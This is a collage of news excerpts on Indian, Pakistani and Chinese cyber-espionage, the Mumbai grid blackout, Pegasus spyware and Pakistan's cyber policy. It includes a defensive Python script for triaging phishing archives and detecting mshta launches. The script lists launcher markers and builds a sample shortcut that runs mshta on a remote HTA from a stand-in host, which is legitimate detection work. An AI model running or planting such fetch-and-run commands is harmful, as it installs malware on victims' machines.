Morgan Wright, chief security advisor at SentinelOne and former US State Department special advisor, told The Daily Swig: “India’s growing offensive capability is still immature compared to China, North Korea, Russia, Israel, the UK and US. However, there is no shortage of people with advanced technical skills in India.”
With Covid-19 causing significant unemployment in India, it can be “safely assumed a portion of people with these skills will engage in cybercrime”, according to Wright.
“Ironically, tactics learned in committing cybercrime will be of value to the intelligence and military establishment in India as they develop and grow units to engage in cyber warfare and espionage,” he said.
Assaf Dahan, senior director and head of threat research at Cybereason, told The Daily Swig: “The level of sophistication of the activity groups affiliated with India can vary; some groups have shown a high level of sophistication and use of advanced custom-built tools or advanced exploits, while others exhibited significantly less sophisticated capabilities.
“Sometimes a group might exhibit different levels of sophistication on different operations, based on the group’s needs and reasoning,” he added.
Dahan concluded: “Another point to remember: the level of sophistication isn’t always correlated with the success rate of the group’s operation or goals. Sometimes, simple social engineering attacks delivering a known commodity malware can be enough to get the threat actors what they want.”
What examples are there of Indian APT groups?
Recent attacks by Indian hacker groups:
The highly active cyber-espionage entity known as SideWinder has been plaguing governments and enterprises since 2012. A recently released report by AT&T Alien Labs shows most of SideWinder’s activity is heavily focused on South Asia and East Asia, with the group likely supporting Indian political interests.
The allegedly Indian state-sponsored group Dropping Elephant has been known to target the Chinese government via spear-phishing and watering hole attacks.
Viceroy Tiger has been known to use weaponised Microsoft Office documents in spear-phishing campaigns. Security researchers at Lookout recently went public with research on mobile malware attributed to the threat actors and rated as medium sophistication.
The level of direct Indian government involvement in some of these operations is contested.
Cybereason’s Dahan cautioned: “The line between ‘state operated’ or ‘state ordered’ can be rather fine, so it’s not always easy to link certain operations directly to an official government or military institution, especially due to the growing popularity of cyber mercenaries (hackers-for-hire).”
How might India expand its cyber warfare capabilities and defences?
Through an emerging initiative to provide technology education to 400,000 low-income students, India will significantly increase its cyber “bench strength”, according to Mike Hamilton, former CISO for the City of Seattle and co-founder and CISO of cybersecurity firm CI Security.
Hamilton predicted that a “cybercrime population will emerge [in India] and differentiate itself from nationalist motivations”.
Other experts reckon the flow of talent will run the other way and allow India to expand its cyber-espionage capabilities by drawing on the cohorts of cybercriminals.
#China Appears to Warn #India : Push Too Hard and the Lights Could Go Out in the Entire #SouthAsian Nation of 1.3 billion. Most of the #malware was never activated in the #Mumbai grid attack that was meant as a warning to #Modi. - The New York Times
As border skirmishing increased last year, malware began to flow into the Indian electric grid, a new study shows, and a blackout hit Mumbai. It now looks like a warning.
Early last summer, Chinese and Indian troops clashed in a surprise border battle in the remote Galwan Valley, bashing each other to death with rocks and clubs.
Four months later and more than 1,500 miles away in Mumbai, India, trains shut down and the stock market closed as the power went out in a city of 20 million people. Hospitals had to switch to emergency generators to keep ventilators running amid a coronavirus outbreak that was among India’s worst.
Now, a new study lends weight to the idea that those two events may well have been connected — as part of a broad Chinese cybercampaign against India’s power grid, timed to send a message that if India pressed its claims too hard, the lights could go out across the country.
The study shows that as the standoff continued in the Himalayas, taking at least two dozen lives, Chinese malware was flowing into the control systems that manage electric supply across India, along with a high-voltage transmission substation and a coal-fired power plant.
The flow of malware was pieced together by Recorded Future, a Somerville, Mass., company that studies the use of the internet by state actors. It found that most of the malware was never activated. And because Recorded Future could not get inside India’s power systems, it could not examine the details of the code itself, which was placed in strategic power-distribution systems across the country. While it has notified Indian authorities, so far they are not reporting what they have found.
Stuart Solomon, Recorded Future’s chief operating officer, said that the Chinese state-sponsored group, which the firm named Red Echo, “has been seen to systematically utilize advanced cyberintrusion techniques to quietly gain a foothold in nearly a dozen critical nodes across the Indian power generation and transmission infrastructure.”
The discovery raises the question about whether an outage that struck on Oct. 13 in Mumbai, one of the country’s busiest business hubs, was meant as a message from Beijing about what might happen if India pushed its border claims too vigorously.
News reports at the time quoted Indian officials as saying that the cause was a Chinese-origin cyberattack on a nearby electricity load-management center. Authorities began a formal investigation, which is due to report in the coming weeks. Since then, Indian officials have gone silent about the Chinese code, whether it set off the Mumbai blackout and the evidence provided to them by Recorded Future that many elements of the nation’s electric grid were the target of a sophisticated Chinese hacking effort.
It is possible the Indians are still searching for the code. But acknowledging its insertion, one former Indian diplomat noted, could complicate the diplomacy in recent days between China’s foreign minister, Wang Yi, and his Indian counterpart, Subrahmanyam Jaishankar, in an effort to ease the border tensions.
#India Suspects #China May Be Behind Major #Mumbai Blackout. Officials are investigating whether #cyberattacks from China could have caused the #power outage, an assertion that China rejects. #Modi #Ladakh https://www.wsj.com/articles/india-suspects-china-may-be-behind-major-mumbai-blackout-11614615383
Indian officials are investigating whether cyberattacks from China could have been behind a blackout in Mumbai last year.
State officials in Maharashtra, of which Mumbai is the capital, said Monday that an initial investigation by its cyber department found evidence that China could have been behind a power outage that left millions without power in October.
It was the worst blackout in decades in India’s financial capital, stopping trains and prompting hospitals to switch to diesel powered generators. The megacity has long prided itself on being one of the few cities in India with uninterrupted power supply even as most of the country struggles with regular blackouts.
Anil Deshmukh, home minister of the state, said officials were investigating a possible connection between the blackout and a surge in cyberattacks on the servers of the state power utilities. He wouldn’t single out China, but said investigators had found evidence of more than a dozen Trojan horse attacks as well as suspicious data transfers into the servers of state power companies.
“There were attempts to login to our servers from foreign land,” said Mr. Deshmukh. “We will investigate further.”
Another state official said 8GB of unaccounted for data slipped into power company servers from China and four other countries between June and October. The official cited thousands of attempts by blacklisted IP addresses to access the servers.
State-sponsored hackers increasingly target critical infrastructure such as power grids instead of specific institutions, said Amit Dubey, a cybersecurity expert at Root64 Foundation, which conducts cybercrime investigations.
“Anything and everything is dependent on power,” Mr. Dubey said. Targeting power supply, he said, can “take down hundreds of plants or day-to-day services like trains.”
Mr. Dubey said many countries such as China, Russia and Iran are deploying state-sponsored hackers to target the power grids of other nations. Russian hackers succeeded in turning off the power in many parts of Ukraine’s capital a few years ago, he said, and have also attacked critical infrastructure in the U.S. in recent years.
India’s announcement came after U.S. cybersecurity firm Recorded Future on Sunday published a report outlining what it said were attacks from a China-linked group it identified as RedEcho. It cited a surge in attacks targeting India’s power infrastructure.
The report said the attacks could have been a reaction to the jump in border tension between the two countries. During a military skirmish in June, India said 20 Indian soldiers were killed and China said four Chinese soldiers were killed when soldiers fought with rocks, batons and clubs wrapped in barbed wire.
In response to the Recorded Future report, which was earlier reported by the New York Times, China said it doesn’t support cyberattacks.
“It is highly irresponsible to accuse a particular party when there is no sufficient evidence around,” Wang Wenbin, spokesman for China’s Ministry of Foreign Affairs, said in a briefing Monday. “China is firmly opposed to such irresponsible and ill-intentioned practice.”
Recorded Future said it couldn’t directly connect the attacks to the Mumbai blackout because it doesn’t have access to any hardware that might have been infected.
India’s Ministry of Power said it has dealt with the threats outlined in the Recorded Future report by strengthening its firewall, blocking IP addresses and using antivirus software to scan and clean its systems software.
IISS Report: #India has some #cyber-intelligence & offensive cyber capabilities but they are focused on #Pakistan. #Delhi is building new capability with the help of key international partners – including #US, #UK & #France. #Cyberwar https://indianexpress.com/article/india/focused-on-pakistan-rather-than-china-india-in-tier-3-as-cyberpower-report-7378610/ via @IndianExpr
Cyberpower, in the study, is measured on seven parameters: from strategy to cybersecurity. India’s reform in cyber governance has been slow. It should better harness its digital start-up ecosystem, says the study.
Greg Austin, who leads the IISS programme on Cyber, Space and Future Conflict and played a leading role in the preparation of the report, told The Indian Express Sunday: “India has some cyber-intelligence and offensive cyber capabilities but they are regionally focused, principally on Pakistan. It is currently aiming to compensate for its weaknesses by building new capability with the help of key international partners – including the US, the UK and France – and by looking to concerted international action to develop norms of restraint.”
The report said that India’s approach towards institutional reform of cyber governance has been “slow and incremental”, with key coordinating authorities for cyber security in the civil and military domains established only as late as 2018 and 2019 respectively.
These work closely with the main cyber-intelligence agency, the National Technical Research Organisation.
“India has a good regional cyber-intelligence reach but relies on partners, including the United States, for wider insight”, the report said.
It said that the strengths of the Indian digital economy include a vibrant start-up culture and a very large talent pool. “The private sector has moved more quickly than the government in promoting national cyber security.”
The country is active and visible in cyber diplomacy but has not been among the leaders on global norms, preferring instead to make productive practical arrangements with key states, the report said.
“India is a third-tier cyber power whose best chance of progressing to the second tier is by harnessing its great digital-industrial potential and adopting a whole-of-society approach to improving its cyber security,” the report said.
The report also assessed China’s cyber power as clearly inferior to that of the US, and substantially below the combined cyber power of the US network of alliances.
The countries covered in this report are US, United Kingdom, Canada and Australia (four of the Five Eyes intelligence allies); France and Israel (the two most cyber-capable partners of the Five Eyes states); Japan (also an ally of the Five Eyes states, but less capable in the security dimensions of cyberspace, despite its formidable economic power); China, Russia, Iran and North Korea (the principal states posing a cyber threat to Western interests); and India, Indonesia, Malaysia and Vietnam (four countries at earlier stages in their cyber-power development). It is an ongoing study, which will cover a total of 40 countries, including Germany, Singapore, Nigeria among others.
India has been put in the third tier meant for countries that have strengths or potential strengths in some of these categories but “significant weaknesses” in others. Also in this category are: Japan, Iran, Indonesia, Vietnam, Malaysia and North Korea.
In the second tier, with world-leading strengths in “some” categories are: Australia, Canada, China, France, Israel, Russia and the United Kingdom.
IISS: Cyber Capabilities and National Power: A Net Assessment
London-based The International Institute for Strategic Studies
India has frequently been the victim of cyber attacks, including on its critical infrastructure, and has attributed a significant proportion of them to China or Pakistan. CERT-In reported, for example, that there were more than 394,499 incidents in 2019,[44] and 2020 saw an upsurge in attacks from China.[45] Of particular concern to the Indian government are cyber attacks by North Korea that use Chinese digital infrastructure.[46] The vast majority of the cyber incidents flagged by CERT-In appear to have been attempts at espionage,[47] but they could also have resulted in serious damage to the integrity of Indian networks and platforms. In 2020, India had the second-highest incidence of ransomware attacks in the world[48] and the government banned 117 Chinese mobile applications because of security concerns.[49]
Public statements by Indian officials and other open-source material indicate that India has developed relatively advanced offensive cyber capabilities focused on Pakistan. It is now in the process of expanding these capabilities for wider effect.
India reportedly considered a cyber response against Pakistan in the aftermath of the November 2008 terrorist attacks in Mumbai, with the NTRO apparently at the forefront of deliberations.[67] A former national security advisor has since indicated publicly that India possesses considerable capacity to conduct cyber-sabotage operations against Pakistan,[68] which appears credible
Overall, India’s focus on Pakistan will have given it useful operational experience and some viable regional offensive cyber capabilities. It will need to expand its cyber-intelligence reach to be able to deliver sophisticated offensive effect further afield, but its close collaboration with international partners, especially the US, will help it in that regard.
Raj Chengappa and Sandeep Unnithan, ‘How to Punish Pakistan’, India Today, 22 September 2016, https://www.indiatoday.in/magazine/cover-story/story/20161003-uri-attack-narendra-modi-pakistan-terror-kashmir-nawaz-sharif-india-vajpayee-829603-2016-09-22.
Pakistan-linked hackers targeted Indian power company with ReverseRat
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.
"Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals."
Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021.
The intrusions are notable for a number of reasons. Besides being highly targeted, the adversary's tactics, techniques, and procedures (TTPs) rely on repurposed open-source code and on compromised domains located in the same country as the targeted entity to host the malicious files, so the download traffic does not stand out as foreign.
At the same time, the group has been careful to hide its activity, modifying registry keys so that it can maintain persistence on the target device without attracting attention.
Explaining the multi-step infection chain, Lumen noted the campaign "resulted in the victim downloading two agents; one resided in-memory, while the second was side-loaded, granting threat actor persistence on the infected workstations."
The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file (.lnk) and a decoy PDF file from a compromised domain.
The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA (HTML application) file from the same compromised website.
The lure documents are largely India-themed: most pose as a user manual for registering and booking a COVID-19 vaccination appointment through the CoWIN online portal, while a few others masquerade as material from the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.
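The chain described above (ZIP from a compromised domain, a .lnk beside a decoy PDF, the shortcut fetching an HTA via mshta) is exactly the kind of thing a blue team can triage mechanically. The following is an added example written for this page, not code from Lumen or Black Lotus Labs: it inspects an archive for a Windows shortcut paired with a decoy document, pulls the launcher strings and URLs out of the shortcut (ShellLink strings are stored as UTF-16LE, which naive string scans miss), and runs a small detection over process-creation events for mshta.exe being handed a remote HTA. The archive, file names, host name and log events are constructed for the demo and are not real indicators from the campaign.

```python
"""Triage helpers for a .lnk + decoy-document phishing archive and an HTA launch.

Added example, not code from the research described above. Every file name,
host name and log event below is constructed for the demo.
"""
import io
import re
import zipfile

# A ShellLink (.lnk) file starts with HeaderSize = 0x4C (little-endian)
# followed by the LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# Strings in a shortcut's target or arguments that mark it as a launcher rather
# than a plain shortcut to a document: the HTA stage, script hosts, remote URLs.
SUSPICIOUS_MARKERS = (b"mshta", b".hta", b"powershell", b"cmd.exe", b"http://", b"https://")

URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/%?=&]*)?")


def lnk_markers(data):
    """Return the suspicious markers present in raw .lnk bytes.

    Shortcut strings are UTF-16LE, so each marker is checked in both its
    ASCII and UTF-16LE form, case-insensitively.
    """
    low = data.lower()
    found = []
    for marker in SUSPICIOUS_MARKERS:
        wide = marker.decode().encode("utf-16-le")
        if marker in low or wide in low:
            found.append(marker.decode())
    return found


def extract_urls(data):
    """Pull http(s) URLs out of the shortcut in ASCII or either UTF-16LE alignment."""
    urls = set(URL_RE.findall(data.decode("latin-1")))
    for off in (0, 1):  # UTF-16LE text may start at an even or odd byte offset
        urls.update(URL_RE.findall(data[off:].decode("utf-16-le", errors="ignore")))
    return sorted(urls)


def triage_zip(zip_bytes):
    """Flag an archive that pairs a Windows shortcut launcher with a decoy document."""
    names, shortcuts = [], {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            names.append(info.filename)
            if info.filename.lower().endswith(".lnk"):
                data = zf.read(info)
                shortcuts[info.filename] = {
                    "is_shortcut": data.startswith(LNK_MAGIC),
                    "markers": lnk_markers(data),
                    "urls": extract_urls(data),
                }
    decoys = [n for n in names if n.lower().endswith((".pdf", ".doc", ".docx"))]
    launcher = any(s["is_shortcut"] and s["markers"] for s in shortcuts.values())
    return {"files": names, "decoys": decoys, "shortcuts": shortcuts,
            "verdict": "suspicious" if launcher and decoys else "benign"}


def detect_hta_launch(events):
    """Return process-creation events where mshta.exe was given a URL or an .hta file.

    Each event is a dict with "image" and "cmdline" keys (Sysmon Event ID 1 style).
    """
    hits = []
    for ev in events:
        cmd = ev["cmdline"].lower()
        if ev["image"].lower().endswith("\\mshta.exe") and (
            "http://" in cmd or "https://" in cmd or ".hta" in cmd
        ):
            hits.append(ev)
    return hits


def build_sample_zip(malicious=True):
    """Constructed sample: a .lnk that runs mshta on a remote HTA, next to a decoy PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("CoWIN_Registration_Guide.pdf", b"%PDF-1.4 decoy document")
        if malicious:
            args = "mshta.exe https://compromised.example.in/cowin/guide.hta"
            fake_lnk = LNK_MAGIC + b"\x00" * 60 + args.encode("utf-16-le")
            zf.writestr("CoWIN_Registration_Guide.pdf.lnk", fake_lnk)
    return buf.getvalue()


# Constructed process-creation events, not real logs.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://compromised.example.in/cowin/guide.hta"},
    {"image": r"C:\Program Files\Adobe\Acrobat.exe",
     "cmdline": r'"Acrobat.exe" C:\Users\u\Downloads\guide.pdf'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Windows\Temp\local.hta"},
]

if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
    print(detect_hta_launch(SAMPLE_EVENTS))
```

The UTF-16LE handling is the part worth copying: grepping a shortcut for `mshta` as an ASCII string finds nothing, because the argument string is stored as `m\0s\0h\0t\0a\0`. The process-level check deliberately fires on a local .hta too, since the campaign's second stage is dropped to disk; tune it against your own baseline of legitimate HTA use before deploying.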
Pegasus was used to hack mobiles of Pak officials
New Delhi: Mobile phones of around 30 Pakistani government servants, who include serving army generals, officials attached with the ISI and senior bureaucrats, were hacked into by using Pegasus spying software during April and May 2019.
In these cases Pegasus got onto the phone through WhatsApp: a buffer-overflow vulnerability in the app's VoIP calling code (CVE-2019-3568, patched by WhatsApp in May 2019) allowed the spyware to be installed by placing a call to the target, who did not need to answer it.
While the Pakistan government has so far kept the matter under wraps, possibly to avoid panic and public embarrassment, it, however, issued a special secret advisory to heads of departments, a copy of which was also sent to the secretary of Prime Minister Imran Khan, asking them to replace all phones purchased before 10 May 2019 immediately and prohibiting the transfer of official documents by using WhatsApp.
The hacking of the mobile numbers of around 30 officials—the exact number is known only to the group/individual/organisation that hacked into the phones—has sparked a frenzy among government officials because of speculation that key documents and vital information might have landed in unintended hands and offices across borders.
Information and classified documents that are generally found in the mobile phones of top government officials, are regarded as invaluable by both foreign government agencies and private operators as they give valuable insights into otherwise closely guarded policies and plans.
The Sunday Guardian reached out to the NSO Group, the Israel-based company that owns Pegasus, with a detailed questionnaire regarding the recent development. In a statement, the NSO Group said: “To protect the ongoing public safety missions of its agency customers and given significant legal and contractual constraints, NSO Group is not able to disclose who is or is not a client or discuss specific uses of its technology, as explained in its Transparency Statement of Principles. However, the company’s products are licensed only to government intelligence and law enforcement agencies for the sole purpose of preventing and investigating terror and serious crime. NSO’s technology is only licensed after a thorough vetting process that goes well beyond the legal requirements that we follow. All potential customers must meet strict export authority regulations before any sale, in addition to NSO’s internal vetting process that includes a focus on human rights. NSO’s governance framework aligns us with the UN Guiding Principles on Business and Human Rights and sets the highest standards in the cyber intelligence industry, embedding human rights due diligence into everything we do.”
This newspaper also shared its questions with the Pakistan high commission in New Delhi, and Pakistan’s Ministry of Information Technology & Telecom for response. However, no response was shared until the time the story went to press.
The NSO Group gained notoriety after it emerged that Pegasus had been used to target around 1,400 WhatsApp users worldwide. Facebook, the owner of WhatsApp, has already filed suit against NSO in US courts over the intrusion into WhatsApp.
Despite the controversy it has attracted in recent times, “Q Cyber Technologies”, the parent company of NSO, continues to remain active in the world of cyber espionage. It was one of the main sponsors of “ISS World Asia”—touted as the world’s largest gathering of law enforcement agencies, intelligence analysts, electronic surveillance and intelligence gathering—which was held in Kuala Lumpur, Malaysia in the first week of December.
In the said event, “Q Cyber Technologies” had defined itself as a company that equipped select intelligence agencies, militaries and law enforcement organisations around the world with the strategic, tactical and analytical technology capabilities required to ensure the success of their operations in fighting crime and terrorism.
India’s Gandhi and Pakistan’s Khan tapped as targets in Israeli NSO spyware scandal - Tech News - Haaretz.com
Prominent Indian politician Rahul Gandhi and Pakistani Prime Minister Imran Khan were selected as potential targets of the Israeli-made Pegasus spyware program by clients of the NSO Group cyberespionage firm, a global investigation can reveal Monday.
Additional potential targets included Pakistani officials, including a number once associated with Pakistani leader Khan. They also included Kashmiri separatists, leading Tibetan religious figures and even an Indian supreme court judge. Khan did not respond to a request for comment from the Washington Post.
Gandhi, who said he changes phones every few months to avoid being hacked, said in response: “Targeted surveillance of the type you describe, whether in regard to me, other leaders of the opposition or indeed any law-abiding citizen of India, is illegal and deplorable.”
According to an analysis of the Pegasus Project records, more than 180 journalists were selected in 21 countries by at least 12 NSO clients. The potential targets and clients hail from Bahrain, Morocco, Saudi Arabia, India, Mexico, Hungary, Azerbaijan, Togo and Rwanda.
India is Israel’s biggest arms market, buying around $1 billion worth of weapons every year, according to Reuters. The two countries have grown closer since Modi became Indian prime minister in 2014, widening commercial cooperation beyond their longstanding defense ties. Modi became the first sitting Indian leader to visit Israel in July 2017, while former Prime Minister Benjamin Netanyahu held a state visit to India at the start of 2018.
#Pakistan #ISI has a record of discovering & breaking up #US #CIA spy agents rings: “Historic Pakistani success in identifying people working for the CIA was a driving force behind the cable, the people familiar with the matter said.” #intelligence https://www.washingtonpost.com/national-security/cia-warning-human-sources-risk/2021/10/05/6e761a02-2613-11ec-8d53-67cfb452aa60_story.html
Counterintelligence officials at the CIA’s headquarters in Langley, Va., have dispatched a cable to officers around the world cautioning them to take greater care in handling human sources, who are at risk of being captured or killed by rival intelligence services, according to people familiar with the matter.
The cable reflected a general concern among the agency’s leadership that its operations officers should pay more attention to protecting their agents, while also recognizing that they have to aggressively recruit spies and informants to perform their intelligence-collection mission, according to the people who spoke on the condition of anonymity to describe a sensitive matter.
Such notices to the field — known as worldwide stations and bases cables (WWSB) — are routine, former officials said. People familiar with the recent cable said it wasn’t prompted by any new penetration of a spy network. But, they added, the cable underscored concerns that CIA officers may be putting recruitment ahead of basic source-protection techniques.
Historic Pakistani success in identifying people working for the CIA was a driving force behind the cable, the people familiar with the matter said.
The CIA is under renewed pressure to recruit and maintain effective spy networks in Pakistan, following the U.S. withdrawal from neighboring Afghanistan and the country’s takeover by the Taliban. Maintaining reliable human sources will be crucial to the Biden administration’s plans to keep tabs on terrorist threats without a military presence on the ground, former officials said.
The CIA cable was first reported by the New York Times.
“These go out every two or three years on counterintelligence concerns. They’re not unusual but are still important reminders to officers to tighten up on tradecraft,” said Thad Troy, a former CIA operations officer who served as a chief of station in several European capitals. Troy said he had not seen the recent cable.
In an unusually revealing detail, the cable noted the number of agents killed by foreign intelligence services. That level of specificity might ordinarily be excluded from a cable that is widely disseminated, as this one was, but it was included to get the attention of CIA officers, who might otherwise regard the bulletin as a routine advisory, people familiar with the message said.
When asked about the cable, a CIA spokeswoman declined to comment.
The CIA has suffered some disastrous penetrations of its spy networks in recent years. In 2011, the agency launched a mole-hunt after an informant in China told his American handlers that everyone he knew who was helping the U.S. government had been discovered by Chinese authorities, who then forced the agents to work for them.
CIA assets in Iran were also identified and arrested in another penetration around the same time.
In both instances, former officials said that agents were probably discovered because of a breach in the CIA’s covert communications system, which it used to secretly communicate with agents in the field.
By invoking previous failures, the cable was probably meant to admonish current officers not to repeat past mistakes.
“If this is being sent to the workforce [rather than a particular CIA station], the message is, ‘Hey, people, let’s be careful,’” said Daniel Hoffman, a former intelligence officer who held senior positions overseas and at headquarters.
Hoffman, who hasn’t seen the cable, said that if the agency wanted to send a more urgent message about an active counterintelligence problem — such as a particular group of sources being compromised — it would handle the matter in a more discreet message to the officers concerned.
Facebook says hackers in Pakistan targeted Afghan users amid government collapse
Hackers from Pakistan used Facebook to target people in Afghanistan with connections to the previous government during the Taliban's takeover of the country, the company's threat investigators said in an interview with Reuters.
Facebook (FB.O) said the group, known in the security industry as SideCopy, shared links to websites hosting malware which could surveil people's devices. Targets included people connected to the government, military and law enforcement in Kabul, it said. Facebook said it removed SideCopy from its platform in August.
The social media company, which recently changed its name to Meta, said the group created fictitious personas of young women as "romantic lures" to build trust and trick targets into clicking phishing links or downloading malicious chat apps. It also compromised legitimate websites to manipulate people into giving up their Facebook credentials.
"It's always difficult for us to speculate as to the end goal of the threat actor," said Facebook's head of cyber espionage investigations, Mike Dvilyanski. "We don't know exactly who was compromised or what the end result of that was."
Major online platforms and email providers including Facebook, Twitter Inc (TWTR.N), Alphabet Inc's (GOOGL.O) Google and Microsoft Corp's (MSFT.O) LinkedIn have said they took steps to lock down Afghan users' accounts during the Taliban's swift takeover of the country this past summer.
Facebook said it had not previously disclosed the hacking campaign, which it said ramped up between April and August, due to safety concerns about its employees in the country and the need for more work to investigate the network. It said it shared information with the U.S. State Department at the time it took down the operation, which it said had appeared "well-resourced and persistent."
The Pegasus Project reporting indicates that the Modi government has used the Israeli spyware not only against its critics at home but also against its perceived enemies abroad. Pakistani Prime Minister Imran Khan is among the most prominent names in the Pegasus Project records, which list his number among those selected as a potential target by the NSO client the reporting associates with India. The Indian government has neither confirmed nor denied the report. Appearance in the leaked list indicates selection for targeting, not confirmed infection; infection was established only for the devices that were forensically examined. The report focuses on the use of the Israeli-made spyware by about a dozen governments against politicians, journalists and activists, and the Pegasus clients it names include the governments of Bahrain, Morocco, Saudi Arabia, India, Mexico, Hungary, Azerbaijan, Togo and Rwanda.
National Center for Cyber Security For Cyber Threats
Hiding a source IP address (for example behind a VPN, a proxy chain or Tor) is trivial, and since the IP address is what makes online activity easiest to trace, this is one reason attribution of cyber attacks is so difficult. It does not by itself make an attacker anonymous: accounts, device fingerprints, reused infrastructure and operational mistakes still link activity to people, which is how the attributions elsewhere on this page were made. The existence of cyber threats is no reason to stay offline. With proper digital hygiene along with government effort, a country can mitigate them.
In 2018, the Government of Pakistan established the National Centre for Cyber Security or NCCS. It was a joint initiative of the Planning Commission and Higher Education Commission. The body currently works in cybercrime forensics, smart devices, and network security.
New ways of committing cyber crimes are emerging with each passing year. Therefore, research and development are critical in fighting different cyber crimes. It is where the role of the National Center for Cyber Security comes in. NCCS deals with both applied and theoretical areas for fighting cybercrime.
It is known for its research on areas like Cyber Reconnaissance, Cybercrime Investigations, Blockchain Security, Digital Forensics, IoT Security, Intrusion Detection Systems, Mobile Phone Security, Internet Security and Privacy, Critical Infrastructure Security and Malware Analysis.
Cyber Security Policy Of Pakistan Is Evolving
In addition to bodies like NCCS, it is also important to have a solid cybersecurity policy. The Government of Pakistan recently approved a new cybersecurity policy to fight electronic crime. The policy is meant to help both public and private institutions fight cybercrime and to create a secure cyber ecosystem in the country through a new governance and institutional framework. It also provides for computer emergency response teams (CERTs) and security operations centres (SOCs) at the institutional, sector and national levels.
Further, the Government of Pakistan will work on improving general awareness of cyber security amongst the public through awareness campaigns, skill development and training programmes.
Why Is Cyber Security Knowledge Important?
Security awareness matters in every sector, and cyber security is no exception. Interconnected systems are essential in today's digitised world, but they carry risks that cyber security knowledge can mitigate. Without that knowledge people fall prey to online crime easily and lose trust in the digital world, and that loss of trust is dangerous for any country in the digital age.
Further, it is not enough to provide the technology and the infrastructure that supports it. The government should inform people about the risks and help them counter those risks. Only then can a country lay a strong foundation for further digitisation.
Pakistan's ranking on the Global Cybersecurity Index is disappointing, so the new cyber security policy is a much-needed change that could improve its ranking in future editions of the index. With strong cyber security laws, Pakistan can support socio-economic development, and the Government of Pakistan is working towards that. For instance, under the new policy a cyberattack on any Pakistani institution will be treated as an act of aggression against national sovereignty, and the government will take the necessary steps to deal with it and punish the offender.
Ignite Conducts Karachi Qualifier Round of Digital Pakistan Cybersecurity Hackathon 2022
Ignite National Technology Fund, a public sector company with the Ministry of IT & Telecom, conducted the qualifier round of Digital Pakistan Cybersecurity Hackathon 2022 in Karachi on 1st December 2022 after conducting qualifier rounds at Quetta and Lahore.
The Cybersecurity Hackathon aims to improve the cybersecurity readiness, protection, and incident response capabilities of the country by conducting cyber drills at a national level and identifying cybersecurity talent for public and private sector organizations.
Dr. Zain ul Abdin, General Manager Ignite, stated that Ignite was excited about organizing Pakistan’s 2nd nationwide cybersecurity hackathon in five cities this year. The purpose of the Cyber Security Hackathon 2022 is to train and prepare cyber security experts in Pakistan, he said.
Speaking on the occasion, Asim Shahryar Husain, CEO Ignite, said, “The goal of the cybersecurity hackathon is to create awareness about the rising importance of cybersecurity for Pakistan and also to identify and motivate cybersecurity talent which can be hired by public and private sector organizations to secure their networks from cyberattacks.”
“There is a shortage of 3-4 million cybersecurity professionals globally. So this is a good opportunity for Pakistan to build capacity of its IT graduates in cybersecurity so that they can boost our IT exports in future,” he added.
Chief guest, Mohsin Mushtaq, Additional Secretary (Incharge) IT & Telecommunication, said, “Digital Pakistan Cybersecurity Hackathon is a step towards harnessing the national talent to form a national cybersecurity response team.”
“Ignite will continue to hold such competitions every year to identify new talent. I would like to congratulate CEO Ignite and his team for holding such a marathon competition across Pakistan to motivate cybersecurity students and professionals all over the country,” he added.
Top cybersecurity experts were invited for keynote talks during the occasion including Moataz Salah, CEO Cyber Talents, Egypt, and Mehzad Sahar, Group Head InfoSec Engro Corp, who delivered the keynote address on Smart InfoSec Strategy.
Panelists from industry, academia, and MoITT officials participated in two panel discussions on “Cyber Threats and Protection Approaches” and “Indigenous Capability & Emerging Technologies” during the event.
The event also included a cybersecurity quiz competition in which 17 teams participated from different universities. The top three teams in the competition were awarded certificates.
41 teams competed from Karachi in the Digital Pakistan Cybersecurity Hackathon 2022.
The top three teams shortlisted after the eight-hour hackathon were: “Team Control” (Winner); “Revolt” (1st Runner-up); and “ASD” (2nd Runner-up).
These top teams will now compete in the final round of the hackathon in Islamabad later this month.